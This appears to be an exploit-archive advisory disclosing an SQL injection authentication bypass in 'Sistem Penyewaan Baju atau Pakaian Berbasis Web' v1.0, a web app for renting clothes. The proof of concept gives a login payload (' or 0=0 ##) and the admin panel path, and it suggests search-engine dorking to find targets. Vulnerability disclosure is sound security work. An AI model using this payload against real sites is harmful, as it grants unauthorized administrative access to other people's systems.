*   UNIX (9,461)
*   UnixWare (188)
*   Windows (6,780)
*   Other

Student Management System 1.0 Insecure Cookie Handling

Sistem Penyewaan Baju atau Pakaian Berbasis Web version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Sistem Penyewaan Baju atau Pakaian Berbasis Web v1.0 Auth By Pass Vulnerability                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://shopee.co.id/Aplikasi-Sistem-Penyewaan-Baju-atau-Pakaian-Berbasis-Web-i.95672618.9716246272                         |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] Panel : http://127.0.0.1/batarisalononline/admin/dashboard.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Tag

#web